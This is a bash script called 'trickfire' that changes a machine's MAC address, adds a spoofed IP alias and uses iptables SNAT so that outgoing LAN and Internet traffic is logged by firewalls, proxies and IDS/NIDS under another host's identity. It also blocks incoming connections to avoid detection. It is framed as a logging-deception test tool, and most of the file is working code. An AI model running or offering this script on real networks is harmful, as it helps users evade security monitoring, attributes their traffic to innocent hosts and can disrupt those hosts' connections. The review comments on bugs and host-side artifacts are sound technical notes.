#!/bin/bash
# Version: 0.1 (24/07/2013)
# Author: Vittorio Milazzo - vittorio.milazzo at gmail.com
#
# Notes: Bash script that spoofs LAN connections
# and deceives firewall, proxy and IDS/NIDS traffic logging.
#
# Prerequisite packages: macchanger, netfilter
#
# ============
# Intended use
# ============
# The script's purpose is to test how firewall/proxy/NIDS logging can be deceived in a local network.
#
# ==========
# Disclaimer
# ==========
# The author published this script and the information under the condition that they
# will not be used to bring profit to himself or others, or to bring damage to others.
# The author is not responsible for any damage or losses of any kind caused by the use or
# misuse of the script and of the information contained therein.
# The author is not liable in any case of damage, including direct, indirect, incidental,
# consequential loss of business profits or special damages.
#
# =======
# Details
# =======
# Three-way handshake completion:
# This script assigns an IP alias ($spoof_ip) to the network interface card and changes the MAC address
# using macchanger. After that, iptables SNAT sends outgoing packets with the alias address
# and the changed MAC address. Hosts that receive the spoofed SYN packets answer the alias
# address (so the replies reach this host) and the handshake completes from the alias.
#
# BE CAREFUL:
# When the spoofed IP/MAC address belongs to a live host on the LAN, both this host and the
# spoofed host may lose packets and some established connections may drop.
#
# Host-side footprint (what 'start' leaves on this machine while active, see enable_spoof):
#   - the NIC's MAC address changed by macchanger
#   - an alias address on $interface:1
#   - one POSTROUTING SNAT rule in the nat table
#   - two INPUT DROP rules for new TCP/UDP connections to the alias
# These are the artifacts a host-integrity or configuration check would pick up.
#
# NOTE(review): every command below (ifconfig, macchanger, iptables, route) presumably
# requires root; nothing in the script checks for it, and no command's exit status is checked.

clear

# Title line printed by the start/stop branches.
BANNER="trickfire v.0.1: Spoofing Lan connection - Firewall and IDS/NIDS deception logging"

#########################
# 1.) NETWORK VARIABLES #
#########################

# Set LAN default gateway IP address (re-added as default route by both functions below).
router="192.168.0.200"

# Set network interface card used for spoofing.
interface="eth0"

# Our real IP address.
# Parsed from the legacy ifconfig "inet addr:" output format.
# NOTE(review): on systems whose ifconfig prints "inet 192.0.2.1" instead, this is empty;
# it is only used for display in the 'stop' branch, so nothing else depends on it.
real_ip=`ifconfig $interface | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}';`

# Our authentic MAC address.
# NOTE(review): hard-coded rather than read from the interface before it is changed;
# 'stop' restores exactly this value, so it must match the NIC's real address.
real_mac="c8:0a:a9:c0:49:a4"

##########################
# 2.) SPOOFING VARIABLES #
##########################
#
# VARIANTS:
#
# A.) SPOOF LAN CONNECTION AND DECEIVE INTERNET TRAFFIC LOGGING
#
# To deceive firewall/proxy or IDS/NIDS logging, spoofed packets must be sent to them.
#
# If you are not sure about the firewall or NIDS IP address, or you don't know whether the LAN holds other NIDS
# or sniffers with addresses on a different network, it is better to send spoofed packets to everything (0/0).
# This setting also spoofs connections towards all LAN hosts.
#
#
# B.) DECEIVE ONLY INTERNET TRAFFIC LOGGING
#
# Otherwise, if no proxy server or IDS/NIDS is present in your network, or you are not interested
# in testing spoofed LAN connections, you can deceive only the firewall's Internet traffic logging by specifying your
# LAN network with its prefix length (Ex: lan_id="192.168.0.0/24").
# With this option iptables SNAT does not send spoofed packets to the LAN itself ( ! -d $lan_id ),
# and spoofed packets arrive (and are logged) only at the default gateway (firewall or router).
#
# If you use this setting, remember to also comment/uncomment the appropriate iptables command below (functions section).

lan_id="0/0"

# IP address that you want to spoof.
spoof_ip="192.168.0.216"

# MAC address that you want to spoof.
spoof_mac="ec:9a:74:64:f6:33"

#################
# 3.) FUNCTIONS #
#################

#######################################
# Apply the spoofed configuration.
# Globals:   interface, spoof_mac, spoof_ip, lan_id, router (all read)
# Arguments: none
# Outputs:   macchanger output is discarded; other commands print to stdout/stderr as usual
# Returns:   status of the last command (route add)
#######################################
enable_spoof () {
# Interface is taken down before macchanger runs and brought back up after the alias is added.
ifconfig $interface down
macchanger -m $spoof_mac $interface >/dev/null
ifconfig $interface:1 $spoof_ip
ifconfig $interface up

# A.) SPOOF LAN CONNECTION AND DECEIVE INTERNET TRAFFIC LOGGING
# Use this if you have set variable lan_id="0/0"
#
iptables -t nat -I POSTROUTING -d $lan_id -j SNAT --to $spoof_ip

# B.) DECEIVE ONLY INTERNET TRAFFIC LOGGING
# Use this if you have set variable lan_id="x.x.x.x/net_prefix"
# (and comment the iptables command above).
#
#iptables -t nat -I POSTROUTING ! -d $lan_id -j SNAT --to $spoof_ip

# Block incoming connections (to avoid being detected by possible listening services).
# NOTE(review): these two INPUT rules are never removed — disable_spoof only flushes the
# nat table — so they stay in the filter table after 'stop' until iptables is flushed or reloaded.
iptables -I INPUT -i $interface -d $spoof_ip -p tcp --syn -m state --state NEW -j DROP
iptables -I INPUT -i $interface -d $spoof_ip -p udp -m state --state NEW -j DROP

# Re-add the default route; presumably lost when the interface was taken down — TODO confirm.
route add default gw $router
}

#######################################
# Revert to the normal configuration.
# Globals:   interface, real_mac, router (all read)
# Arguments: none
# Outputs:   prints the restored default gateway to stdout
# Returns:   status of the last command (route add)
#######################################
disable_spoof () {
ifconfig $interface down >/dev/null
macchanger -m $real_mac $interface >/dev/null
# Alias may already be gone; its error output is suppressed.
ifconfig $interface:1 down 2>/dev/null
# NOTE(review): -F with no chain flushes the ENTIRE nat table, not only the SNAT rule
# inserted by enable_spoof; any pre-existing NAT rules on the host are lost here.
iptables -t nat -F
ifconfig $interface up
echo -e "\033[0;32mDefault gateway: $router\033[m"
route add default gw $router
}

# Command dispatch: start | stop | anything else prints usage.
case "$1" in
start)
echo; echo -e "\033[31m$BANNER\033[m"; echo
# NOTE(review): this line has no "\033[m" reset (the stop branch does); harmless since the next coloured line resets it.
echo; echo -e "\033[31m- Spoofing started"; echo
echo -e "\033[0;32mInterface: $interface\033[m"
echo -e "\033[0;32mSpoofed ip: $spoof_ip\033[m"
echo -e "\033[0;32mSpoofed mac address: $spoof_mac\033[m"
echo
enable_spoof
echo
exit 0
;;
stop)
echo; echo -e "\033[31m$BANNER\033[m"; echo
echo; echo -e "\033[31m- Spoofing stopped\033[m";echo
echo -e "\033[31mBack to normal configuration:\033[m"; echo
echo -e "\033[0;32mInterface: $interface\033[m"
echo -e "\033[0;32mIp address: $real_ip\033[m"
echo -e "\033[0;32mMac adress: $real_mac\033[m"
disable_spoof
echo
exit 0
;;
*)
# Usage box; exits non-zero.
echo
echo -e " \033[31m#####################################################################\033[m"
echo -e " \033[31m# trickfire v.0.1 #\033[m"
echo -e " \033[31m# #\033[m"
echo -e " \033[31m# Spoofing Lan connection - Firewall and IDS/NIDS deception logging #\033[m"
echo -e " \033[31m# #\033[m"
echo -e " \033[31m# Vittorio Milazzo - vittorio.milazzo at gmail.com #\033[m"
echo -e " \033[31m#####################################################################\033[m"
echo;echo -e "\033[36m1.) Change variables inside the script\033[m"
echo;echo -e "\033[36m2.) Usage: ./trickfire.sh {start|stop}\033[m"
echo
exit 1
;;
esac

# Unreachable: every case branch above exits explicitly.
exit 0